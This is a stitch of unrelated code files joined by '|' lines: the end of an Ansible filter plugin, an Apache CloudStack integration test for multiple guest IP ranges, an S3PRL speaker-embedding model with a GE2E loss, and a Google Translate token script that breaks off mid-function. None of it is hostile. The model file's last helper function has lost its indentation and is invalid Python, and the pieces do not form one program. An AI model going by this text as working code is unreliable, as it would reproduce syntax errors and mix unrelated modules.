    inc_dict[name] = path, mutating and returning *inc_dict*.
    '''
    if not isinstance(files, list):
        raise errors.AnsibleFilterError("|failed expects files param to be a list of dicts")
    if not isinstance(inc_dict, dict):
        raise errors.AnsibleFilterError("|failed expects inc_dict param to be a dict")
    inc_dict.update((entry['name'], entry['path']) for entry in files)
    return inc_dict
class FilterModule(object):
    """ Custom ansible filter mapping """
    # pylint: disable=no-self-use, too-few-public-methods
    def filters(self):
        """ Expose the filters provided by this plugin to Ansible. """
        return {"odc_join_files_from_dict": odc_join_files_from_dict}
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Tests for Multiple IP Ranges feature
"""
from marvin.cloudstackTestCase import cloudstackTestCase, unittest
from marvin.lib.utils import cleanup_resources, get_process_status
from marvin.lib.base import (Account,
DiskOffering,
VirtualMachine,
Router,
ServiceOffering,
PublicIpRange)
from marvin.lib.common import (get_domain,
get_zone,
list_routers,
list_hosts,
get_pod,
get_template)
import netaddr
from nose.plugins.attrib import attr
from netaddr import IPNetwork, IPAddress
from marvin.sshClient import SshClient
import random
class TestMultipleIpRanges(cloudstackTestCase):
    """Test Multiple IP Ranges for guest network.

    Fix over the original: six assertions of the form
    ``assertNotEqual(res.find(x) - 1, "message")`` compared an integer with
    the message string and therefore could never fail.  They are corrected
    to ``assertNotEqual(res.find(x), -1, "message")`` so that a missing
    process/alias actually fails the test.
    """
    @classmethod
    def setUpClass(cls):
        cls.testClient = super(TestMultipleIpRanges, cls).getClsTestClient()
        cls.api_client = cls.testClient.getApiClient()
        cls.dbclient = cls.testClient.getDbConnection()
        cls.testdata = cls.testClient.getParsedTestDataConfig()
        # Get Zone, Domain and templates
        cls.domain = get_domain(cls.api_client)
        cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
        cls.pod = get_pod(cls.api_client, cls.zone.id)
        cls.testdata['mode'] = cls.zone.networktype
        cls.testdata["domainid"] = cls.domain.id
        cls.testdata["zoneid"] = cls.zone.id
        cls.account = Account.create(
            cls.api_client,
            cls.testdata["account"],
            domainid=cls.domain.id
        )
        cls.testdata["account"] = cls.account.name
        cls.disk_offering = DiskOffering.create(
            cls.api_client,
            cls.testdata["disk_offering"]
        )
        cls.service_offering = ServiceOffering.create(
            cls.api_client,
            cls.testdata["service_offering"]
        )
        cls.template = get_template(
            cls.api_client,
            cls.zone.id,
            cls.testdata["ostype"]
        )
        cls.testdata["diskoffering"] = cls.disk_offering.id
        cls.dc_id = cls.dbclient.execute(
            "select id from data_center where uuid = '%s';" % str(
                cls.testdata["zoneid"]))
        cls.dc_id = cls.dc_id[0][0]
        cls.ids = cls.dbclient.execute(
            "select id from user_ip_address where allocated is null and data_center_id = '%s';" % str(
                cls.dc_id))
        cls.id_list = []
        for i in range(len(cls.ids)):
            cls.id_list.append(cls.ids[i][0])
        # Check if VR is already present in the setup
        vr_list = Router.list(cls.api_client, listall='true')
        cls.debug("vr list {}".format(vr_list))
        if isinstance(vr_list, list) and len(vr_list) > 0:
            cls.debug("VR is running in the setup")
            cls.vr_state = True
        else:
            cls.debug("VR is not present in the setup")
            cls.vr_state = False
        # Keep two IPs free and mark the rest allocated, so that new VMs
        # are forced onto the new CIDR once those two are used up.
        cls.id_list = cls.id_list[:-2]
        for id in cls.id_list:
            cls.dbclient.execute(
                "update user_ip_address set allocated=now() where id = '%s';" %
                str(id))
        # create new vlan ip range
        # Before creating ip range check the zone's network type
        if cls.zone.networktype.lower() == 'basic':
            cls.new_vlan = cls.createNewVlanRange()
        else:
            raise unittest.SkipTest(
                "These tests can be run only on basic zone.\
                        So skipping the tests")
        # Deploy vm in existing subnet if VR is not present
        if cls.vr_state is False:
            cls.vm_res = VirtualMachine.create(
                cls.api_client,
                cls.testdata["server_without_disk"],
                templateid=cls.template.id,
                accountid=cls.account.name,
                domainid=cls.testdata["domainid"],
                zoneid=cls.testdata["zoneid"],
                serviceofferingid=cls.service_offering.id,
                mode=cls.testdata["mode"],
            )
        cls._cleanup = [
            cls.new_vlan,
            cls.account,
        ]
        return
    @classmethod
    def createNewVlanRange(cls):
        """ Increment current cidr of vlan range present in network
        and create new range
        """
        publicIpRange = PublicIpRange.list(cls.api_client)
        cls.startIp = publicIpRange[0].startip
        cls.endIp = publicIpRange[0].endip
        cls.gateway = publicIpRange[0].gateway
        cls.netmask = publicIpRange[0].netmask
        # Pass ip address and mask length to IPNetwork to findout the CIDR
        ip = IPNetwork(cls.startIp + "/" + cls.netmask)
        # Take random increment factor to avoid adding the same vlan ip range
        # in each test case
        networkIncrementFactor = random.randint(1, 255)
        new_cidr = ip.__iadd__(networkIncrementFactor)
        ip2 = IPNetwork(new_cidr)
        test_nw = ip2.network
        ip = IPAddress(test_nw)
        # Add IP range(5 IPs) in the new CIDR
        test_gateway = ip.__add__(1)
        test_startIp = ip.__add__(3)
        test_endIp = ip.__add__(10)
        # Populating services with new IP range
        cls.testdata["vlan_ip_range"]["startip"] = test_startIp
        cls.testdata["vlan_ip_range"]["endip"] = test_endIp
        cls.testdata["vlan_ip_range"]["gateway"] = test_gateway
        cls.testdata["vlan_ip_range"]["netmask"] = cls.netmask
        cls.testdata["vlan_ip_range"]["zoneid"] = cls.zone.id
        cls.testdata["vlan_ip_range"]["podid"] = cls.pod.id
        return PublicIpRange.create(
            cls.api_client,
            cls.testdata["vlan_ip_range"])
    @classmethod
    def tearDownClass(cls):
        try:
            # Release the IPs we artificially marked as allocated in setUpClass
            for id in cls.id_list:
                cls.dbclient.execute(
                    "update user_ip_address set allocated=default where id = '%s';" %
                    str(id))
            # Cleanup resources used
            cleanup_resources(cls.api_client, cls._cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return
    def setUp(self):
        self.apiclient = self.testClient.getApiClient()
        self.dbclient = self.testClient.getDbConnection()
        self.cleanup = []
        # Deploy guest vm
        try:
            self.virtual_machine = VirtualMachine.create(
                self.apiclient,
                self.testdata["server_without_disk"],
                templateid=self.template.id,
                accountid=self.account.name,
                domainid=self.testdata["domainid"],
                zoneid=self.testdata["zoneid"],
                serviceofferingid=self.service_offering.id,
                mode=self.testdata["mode"],
            )
        except Exception as e:
            raise Exception(
                "Warning: Exception during vm deployment: {}".format(e))
        self.vm_response = VirtualMachine.list(
            self.apiclient,
            id=self.virtual_machine.id
        )
        self.assertEqual(
            isinstance(self.vm_response, list),
            True,
            "Check VM list response returned a valid list"
        )
        self.ip_range = list(
            netaddr.iter_iprange(
                unicode(
                    self.testdata["vlan_ip_range"]["startip"]), unicode(
                    self.testdata["vlan_ip_range"]["endip"])))
        self.nic_ip = netaddr.IPAddress(
            unicode(
                self.vm_response[0].nic[0].ipaddress))
        self.debug("vm got {} as ip address".format(self.nic_ip))
        self.assertIn(
            self.nic_ip,
            self.ip_range,
            "VM did not get the ip address from the new ip range"
        )
        ip_alias = self.dbclient.execute(
            "select ip4_address from nic_ip_alias;"
        )
        self.alias_ip = str(ip_alias[0][0])
        self.debug("alias ip : %s" % self.alias_ip)
        self.assertNotEqual(
            self.alias_ip,
            None,
            "Error in creating ip alias. Please check MS logs"
        )
        self.cleanup.append(self.virtual_machine)
        return
    def tearDown(self):
        try:
            # Clean up, terminate the resources created
            cleanup_resources(self.apiclient, self.cleanup)
        except Exception as e:
            raise Exception("Warning: Exception during cleanup : %s" % e)
        return
    def verify_vlan_range(self, vlan, services):
        # compare vlan_list response with configured values
        self.assertEqual(
            isinstance(vlan, list),
            True,
            "Check list response returned a valid list"
        )
        self.assertNotEqual(
            len(vlan),
            0,
            "check list vlan response"
        )
        self.assertEqual(
            str(vlan[0].startip),
            str(services["startip"]),
            "Start IP in vlan ip range is not matched with the\
                configured start ip"
        )
        self.assertEqual(
            str(vlan[0].endip),
            str(services["endip"]),
            "End IP in vlan ip range is not matched with the configured end ip"
        )
        self.assertEqual(
            str(vlan[0].gateway),
            str(services["gateway"]),
            "gateway in vlan ip range is not matched with the\
                configured gateway"
        )
        self.assertEqual(
            str(vlan[0].netmask),
            str(services["netmask"]),
            "netmask in vlan ip range is not matched with\
                the configured netmask"
        )
        return
    @attr(tags=["sg"])
    def test_01_deploy_vm_in_new_cidr(self):
        """Deploy guest vm after adding guest IP range in new CIDR
        1.Deploy guest vm
        2.Verify vm gets the ip address from new cidr
        """
        self.ip_range = list(
            netaddr.iter_iprange(
                unicode(
                    self.testdata["vlan_ip_range"]["startip"]), unicode(
                    self.testdata["vlan_ip_range"]["endip"])))
        self.nic_ip = netaddr.IPAddress(
            unicode(
                self.vm_response[0].nic[0].ipaddress))
        self.debug("vm got {} as ip address".format(self.nic_ip))
        self.assertIn(
            self.nic_ip,
            self.ip_range,
            "VM did not get the ip address from the new ip range"
        )
        return
    @attr(tags=["sg"])
    def test_02_dns_service_on_alias_ip(self):
        """Deploy guest vm in new CIDR and verify dns service on alias ip
        1.Deploy guest vm in new cidr
        2.Verify dns service listens on alias ip in VR
        """
        list_router_response = list_routers(
            self.apiclient,
            zoneid=self.zone.id,
            listall=True
        )
        self.assertEqual(
            isinstance(list_router_response, list),
            True,
            "Check list response returns a valid list"
        )
        router = list_router_response[0]
        hosts = list_hosts(
            self.apiclient,
            zoneid=router.zoneid,
            type='Routing',
            state='Up',
            id=router.hostid
        )
        self.assertEqual(
            isinstance(hosts, list),
            True,
            "Check list host returns a valid list"
        )
        host = hosts[0]
        self.debug("Router ID: %s, state: %s" % (router.id, router.state))
        self.assertEqual(
            router.state,
            'Running',
            "Check list router response for router state"
        )
        port = self.testdata['configurableData']['host']["publicport"]
        username = self.testdata['configurableData']['host']["username"]
        password = self.testdata['configurableData']['host']["password"]
        # SSH to host so that host key is saved in first
        # attempt
        SshClient(host.ipaddress, port, username, password)
        proc = self.alias_ip + ":53"
        result = get_process_status(
            host.ipaddress,
            port,
            username,
            password,
            router.linklocalip,
            "netstat -atnp | grep %s" % proc
        )
        res = str(result)
        self.debug("Dns process status on alias ip: %s" % res)
        # str.find returns -1 when the substring is absent (fixed: the
        # original fused "-1" into the message argument, making this vacuous)
        self.assertNotEqual(
            res.find(proc),
            -1,
            "dnsmasq service is not running on alias ip"
        )
        return
    @attr(tags=["sg"])
    def test_03_passwd_service_on_alias_IP(self):
        """Deploy guest vm in new CIDR and verify passwd service on alias ip
        1.Deploy guest vm in new cidr
        2.Verify password service(socat) listens on alias ip in VR
        """
        list_router_response = list_routers(
            self.apiclient,
            zoneid=self.zone.id,
            listall=True
        )
        self.assertEqual(
            isinstance(list_router_response, list),
            True,
            "Check list response returns a valid list"
        )
        router = list_router_response[0]
        hosts = list_hosts(
            self.apiclient,
            zoneid=router.zoneid,
            type='Routing',
            state='Up',
            id=router.hostid
        )
        self.assertEqual(
            isinstance(hosts, list),
            True,
            "Check list host returns a valid list"
        )
        host = hosts[0]
        self.debug("Router ID: %s, state: %s" % (router.id, router.state))
        self.assertEqual(
            router.state,
            'Running',
            "Check list router response for router state"
        )
        port = self.testdata['configurableData']['host']["publicport"]
        username = self.testdata['configurableData']['host']["username"]
        password = self.testdata['configurableData']['host']["password"]
        # SSH to host so that host key is saved in first
        # attempt
        SshClient(host.ipaddress, port, username, password)
        proc = "socat"
        result = get_process_status(
            host.ipaddress,
            port,
            username,
            password,
            router.linklocalip,
            "netstat -atnp | grep %s" % proc
        )
        res = str(result)
        self.debug("password process status on VR: %s" % res)
        # fixed vacuous assertion (see class docstring)
        self.assertNotEqual(
            res.find(self.alias_ip),
            -1,
            "password service is not running on alias ip"
        )
        return
    @attr(tags=["sg"])
    def test_04_userdata_service_on_alias_IP(self):
        """Deploy guest vm in new CIDR and verify userdata service on alias ip
        1.Deploy guest vm in new cidr
        2.Verify userdata service(apache2) listens on alias ip in VR
        """
        list_router_response = list_routers(
            self.apiclient,
            zoneid=self.zone.id,
            listall=True
        )
        self.assertEqual(
            isinstance(list_router_response, list),
            True,
            "Check list response returns a valid list"
        )
        router = list_router_response[0]
        hosts = list_hosts(
            self.apiclient,
            zoneid=router.zoneid,
            type='Routing',
            state='Up',
            id=router.hostid
        )
        self.assertEqual(
            isinstance(hosts, list),
            True,
            "Check list host returns a valid list"
        )
        host = hosts[0]
        self.debug("Router ID: %s, state: %s" % (router.id, router.state))
        self.assertEqual(
            router.state,
            'Running',
            "Check list router response for router state"
        )
        port = self.testdata['configurableData']['host']["publicport"]
        username = self.testdata['configurableData']['host']["username"]
        password = self.testdata['configurableData']['host']["password"]
        # SSH to host so that host key is saved in first
        # attempt
        SshClient(host.ipaddress, port, username, password)
        proc = "apache2"
        result = get_process_status(
            host.ipaddress,
            port,
            username,
            password,
            router.linklocalip,
            "netstat -atnp | grep %s" % proc
        )
        res = str(result)
        self.debug("userdata process status on VR: %s" % res)
        # fixed vacuous assertion; message also corrected (this test checks
        # the userdata service, not the password service)
        self.assertNotEqual(
            res.find(self.alias_ip + ":80 "),
            -1,
            "userdata service is not running on alias ip"
        )
        return
    @attr(tags=["sg"])
    def test_05_del_cidr_verify_alias_removal(self):
        """Destroy lastvm in the CIDR and verifly alias removal
        1.Deploy guest vm in new cidr
        2.Verify ip alias creation
        3.Destroy vm and wait for it to expunge
        4.Verify ip alias removal after vm expunge
        """
        list_router_response = list_routers(
            self.apiclient,
            zoneid=self.zone.id,
            listall=True
        )
        self.assertEqual(
            isinstance(list_router_response, list),
            True,
            "Check list response returns a valid list"
        )
        router = list_router_response[0]
        hosts = list_hosts(
            self.apiclient,
            zoneid=router.zoneid,
            type='Routing',
            state='Up',
            id=router.hostid
        )
        self.assertEqual(
            isinstance(hosts, list),
            True,
            "Check list host returns a valid list"
        )
        host = hosts[0]
        self.debug("Router ID: %s, state: %s" % (router.id, router.state))
        self.assertEqual(
            router.state,
            'Running',
            "Check list router response for router state"
        )
        port = self.testdata['configurableData']['host']["publicport"]
        username = self.testdata['configurableData']['host']["username"]
        password = self.testdata['configurableData']['host']["password"]
        # SSH to host so that host key is saved in first
        # attempt
        SshClient(host.ipaddress, port, username, password)
        proc = "ip addr show eth0"
        result = get_process_status(
            host.ipaddress,
            port,
            username,
            password,
            router.linklocalip,
            proc
        )
        res = str(result)
        self.debug("ip alias configuration on VR: %s" % res)
        # fixed vacuous assertion (see class docstring)
        self.assertNotEqual(
            res.find(self.alias_ip),
            -1,
            "ip alias is not created on VR eth0"
        )
        self.virtual_machine.delete(self.apiclient)
        self.debug(
            "Verify that expunging the last vm in the CIDR should\
                    delete the ip alias from VR")
        ip_alias2 = self.dbclient.execute(
            "select ip4_address from nic_ip_alias;"
        )
        self.assertEqual(
            isinstance(ip_alias2, list),
            True,
            "Error in sql query"
        )
        self.assertEqual(
            len(ip_alias2),
            0,
            "Failure in clearing ip alias entry from cloud db"
        )
        proc = "ip addr show eth0"
        result = get_process_status(
            host.ipaddress,
            port,
            username,
            password,
            router.linklocalip,
            proc
        )
        res = str(result)
        self.assertEqual(
            res.find(
                self.alias_ip),
            -1,
            "Failed to clean up ip alias from VR even after\
                    last vm expunge in the CIDR")
        self.debug("IP alias got deleted from VR successfully.")
        self.cleanup.remove(self.virtual_machine)
        return
    @attr(tags=["sg"])
    def test_06_reboot_VR_verify_ip_alias(self):
        """Reboot VR and verify ip alias
        1.Deploy guest vm in new cidr
        2.Verify ip alias creation
        3.Reboot VR
        4.Verify ip alias on VR
        """
        list_router_response = list_routers(
            self.apiclient,
            zoneid=self.zone.id,
            listall=True
        )
        self.assertEqual(
            isinstance(list_router_response, list),
            True,
            "Check list response returns a valid list"
        )
        router = list_router_response[0]
        hosts = list_hosts(
            self.apiclient,
            zoneid=router.zoneid,
            type='Routing',
            state='Up',
            id=router.hostid
        )
        self.assertEqual(
            isinstance(hosts, list),
            True,
            "Check list host returns a valid list"
        )
        host = hosts[0]
        self.debug("Router ID: %s, state: %s" % (router.id, router.state))
        self.assertEqual(
            router.state,
            'Running',
            "Check list router response for router state"
        )
        port = self.testdata['configurableData']['host']["publicport"]
        username = self.testdata['configurableData']['host']["username"]
        password = self.testdata['configurableData']['host']["password"]
        # SSH to host so that host key is saved in first
        # attempt
        SshClient(host.ipaddress, port, username, password)
        proc = "ip addr show eth0"
        result = get_process_status(
            host.ipaddress,
            port,
            username,
            password,
            router.linklocalip,
            proc
        )
        res = str(result)
        self.debug("ip alias configuration on VR: %s" % res)
        # fixed vacuous assertion (see class docstring)
        self.assertNotEqual(
            res.find(self.alias_ip),
            -1,
            "ip alias is not created on VR eth0"
        )
        resp = Router.reboot(
            self.apiclient,
            router.id
        )
        self.debug("Reboot router api response: %s" % resp)
        list_router_response = list_routers(
            self.apiclient,
            zoneid=self.zone.id,
            listall=True
        )
        self.assertEqual(
            isinstance(list_router_response, list),
            True,
            "Check list response returns a valid list"
        )
        router = list_router_response[0]
        self.assertEqual(
            router.state,
            'Running',
            "Router is not in running state after reboot"
        )
        result = get_process_status(
            host.ipaddress,
            port,
            username,
            password,
            router.linklocalip,
            proc
        )
        res = str(result)
        self.assertNotEqual(
            res.find(self.alias_ip),
            -1,
            "IP alias not present on VR after VR reboot"
        )
        return
    @attr(tags=["sg"])
    def test_07_stop_start_VR_verify_ip_alias(self):
        """Reboot VR and verify ip alias
        1.Deploy guest vm in new cidr
        2.Verify ip alias creation
        3.Stop and Start VR
        4.Verify ip alias on VR
        """
        list_router_response = list_routers(
            self.apiclient,
            zoneid=self.zone.id,
            listall=True
        )
        self.assertEqual(
            isinstance(list_router_response, list),
            True,
            "Check list response returns a valid list"
        )
        router = list_router_response[0]
        hosts = list_hosts(
            self.apiclient,
            zoneid=router.zoneid,
            type='Routing',
            state='Up',
            id=router.hostid
        )
        self.assertEqual(
            isinstance(hosts, list),
            True,
            "Check list host returns a valid list"
        )
        host = hosts[0]
        self.debug("Router ID: %s, state: %s" % (router.id, router.state))
        self.assertEqual(
            router.state,
            'Running',
            "Check list router response for router state"
        )
        port = self.testdata['configurableData']['host']["publicport"]
        username = self.testdata['configurableData']['host']["username"]
        password = self.testdata['configurableData']['host']["password"]
        # SSH to host so that host key is saved in first
        # attempt
        SshClient(host.ipaddress, port, username, password)
        proc = "ip addr show eth0"
        result = get_process_status(
            host.ipaddress,
            port,
            username,
            password,
            router.linklocalip,
            proc
        )
        res = str(result)
        self.debug("ip alias configuration on VR: %s" % res)
        # fixed vacuous assertion (see class docstring)
        self.assertNotEqual(
            res.find(self.alias_ip),
            -1,
            "ip alias is not created on VR eth0"
        )
        self.debug("Stopping VR")
        Router.stop(
            self.apiclient,
            router.id,
        )
        self.debug("Starting VR")
        Router.start(
            self.apiclient,
            router.id
        )
        list_router_response = list_routers(
            self.apiclient,
            zoneid=self.zone.id,
            listall=True
        )
        self.assertEqual(
            isinstance(list_router_response, list),
            True,
            "Check list response returns a valid list"
        )
        router = list_router_response[0]
        self.assertEqual(
            router.state,
            'Running',
            "Router is not in running state after reboot"
        )
        self.debug("VR is up and Running")
        result = get_process_status(
            host.ipaddress,
            port,
            username,
            password,
            router.linklocalip,
            proc
        )
        res = str(result)
        self.assertNotEqual(
            res.find(self.alias_ip),
            -1,
            "IP alias not present on VR after VR stop and start"
        )
        return
|
# -*- coding: utf-8 -*- #
"""*********************************************************************************************"""
# FileName [ model.py ]
# Synopsis [ the linear model ]
# Author [ S3PRL ]
# Copyright [ Copyleft(c), Speech Lab, NTU, Taiwan ]
"""*********************************************************************************************"""
###############
# IMPORTATION #
###############
import torch
import torch.nn as nn
import torch.nn.functional as F
from functools import lru_cache
from argparse import Namespace
from s3prl.upstream.mockingjay.model import TransformerEncoder
#########
# MODEL #
#########
class Identity(nn.Module):
    """No-op aggregator: passes the pretrained feature through untouched."""
    def __init__(self, config, **kwargs):
        super(Identity, self).__init__()
        # nothing to configure — this module holds no parameters
    def forward(self, feature, att_mask, head_mask, **kwargs):
        # wrap in a list to mirror the encoder interface (list of layers)
        return [feature]
class Mean(nn.Module):
    """Mean pooling preceded by one hidden layer (Tanh then Linear).

    Each sequence is averaged over its valid length, derived from the
    attention-mask logits, to produce an utterance-level representation.
    """
    def __init__(self, out_dim):
        super(Mean, self).__init__()
        self.act_fn = nn.Tanh()
        self.linear = nn.Linear(out_dim, out_dim)
    def forward(self, feature, att_mask):
        '''
        Arguments
            feature  - [BxTxD] acoustic features
            att_mask - attention-mask logits; the first position with a
                       negative value ends the valid part of each sequence
        '''
        projected = self.linear(self.act_fn(feature))
        pooled = []
        for seq, mask in zip(projected, att_mask):
            padding = torch.nonzero(mask < 0, as_tuple=False)
            # no negative logit means the whole sequence is valid
            valid_len = len(seq) if padding.size(0) == 0 else padding[0] + 1
            pooled.append(torch.mean(seq[:valid_len], dim=0))
        return torch.stack(pooled)
class SAP(nn.Module):
    """Self-attention pooling that incorporates an attention mask.

    Applies Tanh to the features, then delegates pooling to
    SelfAttentionPooling.
    """
    def __init__(self, out_dim):
        super(SAP, self).__init__()
        self.act_fn = nn.Tanh()
        self.sap_layer = SelfAttentionPooling(out_dim)
    def forward(self, feature, att_mask):
        '''
        Arguments
            feature  - [BxTxD] acoustic features
            att_mask - attention-mask logits added to the attention scores
        '''
        activated = self.act_fn(feature)
        return self.sap_layer(activated, att_mask)
class SelfAttentionPooling(nn.Module):
    """
    Implementation of SelfAttentionPooling
    Original Paper: Self-Attention Encoding and Pooling for Speaker Recognition
    https://arxiv.org/pdf/2008.01077v1.pdf
    """
    def __init__(self, input_dim):
        super(SelfAttentionPooling, self).__init__()
        self.W = nn.Linear(input_dim, 1)
        self.softmax = nn.functional.softmax
    def forward(self, batch_rep, att_mask):
        """
        input:
            batch_rep : size (N, T, H) — batch, sequence length, hidden dim
            att_mask  : additive mask logits applied to the attention scores
        return:
            utter_rep : size (N, H)
        """
        # per-timestep scores, masked additively so padded steps get ~0 weight
        scores = self.W(batch_rep).squeeze(-1) + att_mask
        weights = self.softmax(scores, dim=-1).unsqueeze(-1)
        # weighted sum over the time axis
        return (batch_rep * weights).sum(dim=1)
class Model(nn.Module):
    """Encode upstream features and pool them into an utterance vector.

    `agg_module` names the pooling class ("SAP" or "Mean"); the encoder
    class is named by config['module'].
    """
    def __init__(self, input_dim, agg_module, config):
        super(Model, self).__init__()
        # NOTE(review): both classes are resolved by name with eval(); the
        # names come from the experiment config, not from untrusted input.
        self.agg_method = eval(agg_module)(input_dim)
        self.model = eval(config['module'])(config=Namespace(**config['hparams']),)
        # one (empty) head mask per transformer layer
        self.head_mask = [None] * config['hparams']['num_hidden_layers']
    def forward(self, features, att_mask):
        encoded = self.model(
            features,
            att_mask[:, None, None],
            head_mask=self.head_mask,
            output_all_encoded_layers=False,
        )
        return self.agg_method(encoded[0], att_mask)
class GE2E(nn.Module):
    """Implementation of the GE2E loss in https://arxiv.org/abs/1710.10467 [1]
    Accepts an input of size (N, M, D)
        where N is the number of speakers in the batch,
        M is the number of utterances per speaker,
        and D is the dimensionality of the embedding vector (e.g. d-vector)
    Args:
        - init_w (float): the initial value of w in Equation (5) of [1]
        - init_b (float): the initial value of b in Equation (5) of [1]
    """
    def __init__(self, init_w=10.0, init_b=-5.0, loss_method='softmax'):
        super(GE2E, self).__init__()
        # learnable scale/offset applied to the cosine-similarity matrix
        self.w = nn.Parameter(torch.tensor(init_w))
        self.b = nn.Parameter(torch.tensor(init_b))
        self.loss_method = loss_method
        assert self.loss_method in ['softmax', 'contrast']
        # dispatch to the chosen per-embedding loss variant
        if self.loss_method == 'softmax':
            self.embed_loss = self.embed_loss_softmax
        if self.loss_method == 'contrast':
            self.embed_loss = self.embed_loss_contrast
    def cosine_similarity(self, dvecs):
        """Calculate cosine similarity matrix of shape (N, M, N)."""
        n_spkr, n_uttr, d_embd = dvecs.size()
        # expand each d-vector so it can be compared against every centroid
        dvec_expns = dvecs.unsqueeze(-1).expand(n_spkr, n_uttr, d_embd, n_spkr)
        dvec_expns = dvec_expns.transpose(2, 3)
        # per-speaker centroids (mean over utterances)
        ctrds = dvecs.mean(dim=1).to(dvecs.device)
        ctrd_expns = ctrds.unsqueeze(0).expand(n_spkr * n_uttr, n_spkr, d_embd)
        ctrd_expns = ctrd_expns.reshape(-1, d_embd)
        # build "leave-one-out" centroids: for each utterance, the centroid of
        # its own speaker is recomputed excluding that utterance (Eq. (8) of [1])
        dvec_rolls = torch.cat([dvecs[:, 1:, :], dvecs[:, :-1, :]], dim=1)
        dvec_excls = dvec_rolls.unfold(1, n_uttr-1, 1)
        mean_excls = dvec_excls.mean(dim=-1).reshape(-1, d_embd)
        # overwrite the own-speaker slots with the leave-one-out centroids
        indices = _indices_to_replace(n_spkr, n_uttr).to(dvecs.device)
        ctrd_excls = ctrd_expns.index_copy(0, indices, mean_excls)
        ctrd_excls = ctrd_excls.view_as(dvec_expns)
        return F.cosine_similarity(dvec_expns, ctrd_excls, 3, 1e-9)
    def embed_loss_softmax(self, dvecs, cos_sim_matrix):
        """Calculate the loss on each embedding by taking softmax."""
        n_spkr, n_uttr, _ = dvecs.size()
        indices = _indices_to_replace(n_spkr, n_uttr).to(dvecs.device)
        # keep only each utterance's similarity to its own speaker's centroid
        losses = -F.log_softmax(cos_sim_matrix, 2)
        return losses.flatten().index_select(0, indices).view(n_spkr, n_uttr)
    def embed_loss_contrast(self, dvecs, cos_sim_matrix):
        """Calculate the loss on each embedding by contrast loss."""
        N, M, _ = dvecs.shape
        L = []
        for j in range(N):
            L_row = []
            for i in range(M):
                centroids_sigmoids = torch.sigmoid(cos_sim_matrix[j, i])
                # sigmoids against all other speakers' centroids
                excl_centroids_sigmoids = torch.cat(
                    (centroids_sigmoids[:j], centroids_sigmoids[j+1:]))
                # Eq. (7) of [1]: own-centroid term plus hardest negative
                L_row.append(1. - torch.sigmoid(cos_sim_matrix[j, i, j]) +
                             torch.max(excl_centroids_sigmoids))
            L_row = torch.stack(L_row)
            L.append(L_row)
        return torch.stack(L)
    def forward(self, dvecs):
        """Calculate the GE2E loss for an input of dimensions (N, M, D)."""
        cos_sim_matrix = self.cosine_similarity(dvecs)
        # NOTE(review): torch.clamp is not in-place and its result is
        # discarded — presumably meant to keep w positive; confirm intent.
        torch.clamp(self.w, 1e-9)
        cos_sim_matrix = cos_sim_matrix * self.w + self.b
        L = self.embed_loss(dvecs, cos_sim_matrix)
        return L.sum()
@lru_cache(maxsize=5)
def _indices_to_replace(n_spkr, n_uttr):
indices = [(s * n_uttr + u) * n_spkr + s
for s in range(n_spkr) for u in range(n_uttr)]
return torch.LongTensor(indices)
|
import requests
import json
#from bs4 import BeautifulSoup
import execjs  # required — install via pip first; used to execute the JS token script
class Py4Js():
    """Compute Google Translate's `tk` request token.

    Wraps the token-generation JavaScript (extracted from the translate web
    client) in an execjs context; the JS source must stay byte-for-byte as
    captured, since the token algorithm depends on its exact constants.
    """
    def __init__(self):
        # Compile the captured token script once; getTk() reuses the context.
        self.ctx = execjs.compile("""
        function TL(a) {
        var k = "";
        var b = 406644;
        var b1 = 3293161072;
        var jd = ".";
        var $b = "+-a^+6";
        var Zb = "+-3^+b+-f";
        for (var e = [], f = 0, g = 0; g < a.length; g++) {
            var m = a.charCodeAt(g);
            128 > m ? e[f++] = m : (2048 > m ? e[f++] = m >> 6 | 192 : (55296 == (m & 64512) && g + 1 < a.length && 56320 == (a.charCodeAt(g + 1) & 64512) ? (m = 65536 + ((m & 1023) << 10) + (a.charCodeAt(++g) & 1023),
            e[f++] = m >> 18 | 240,
            e[f++] = m >> 12 & 63 | 128) : e[f++] = m >> 12 | 224,
            e[f++] = m >> 6 & 63 | 128),
            e[f++] = m & 63 | 128)
        }
        a = b;
        for (f = 0; f < e.length; f++) a += e[f],
        a = RL(a, $b);
        a = RL(a, Zb);
        a ^= b1 || 0;
        0 > a && (a = (a & 2147483647) + 2147483648);
        a %= 1E6;
        return a.toString() + jd + (a ^ b)
    };
    function RL(a, b) {
        var t = "a";
        var Yb = "+";
        for (var c = 0; c < b.length - 2; c += 3) {
            var d = b.charAt(c + 2),
            d = d >= t ? d.charCodeAt(0) - 87 : Number(d),
            d = b.charAt(c + 1) == Yb ? a >>> d: a << d;
            a = b.charAt(c) == Yb ? a + d & 4294967295 : a ^ d
        }
        return a
    }
    """)
    def getTk(self, text):
        """Return the `tk` token string for *text*."""
        return self.ctx.call("TL", text)
# English -> Chinese
def buildUrl_e2c(text, tk):
    """Build the Google Translate request URL for English -> Chinese.

    `tk` is the request token produced by Py4Js.getTk(); `text` is appended
    as-is in the `q` parameter.
    """
    params = [
        'client=webapp', 'sl=en', 'tl=zh-CN', 'hl=en',
        'dt=at', 'dt=bd', 'dt=ex', 'dt=ld', 'dt=md', 'dt=qca',
        'dt=rw', 'dt=rm', 'dt=ss', 'dt=t',
        'ie=UTF-8', 'oe=UTF-8', 'otf=1', 'pc=1',
        'ssel=0', 'tsel=0', 'kc=2',
        'tk=' + str(tk), 'q=' + text,
    ]
    return 'https://translate.google.cn/translate_a/single?' + '&'.join(params)
# Chinese -> English
def buildUrl_c2e(text, tk):
    """Build the Google Translate request URL for Chinese -> English.

    `tk` is the request token produced by Py4Js.getTk(); `text` is appended
    as-is in the `q` parameter.
    """
    params = [
        'client=webapp', 'sl=zh-CN', 'tl=en', 'hl=zh-CN',
        'dt=at', 'dt=bd', 'dt=ex', 'dt=ld', 'dt=md', 'dt=qca',
        'dt=rw', 'dt=rm', 'dt=ss', 'dt=t',
        'ie=UTF-8', 'oe=UTF-8', 'otf=1', 'pc=1',
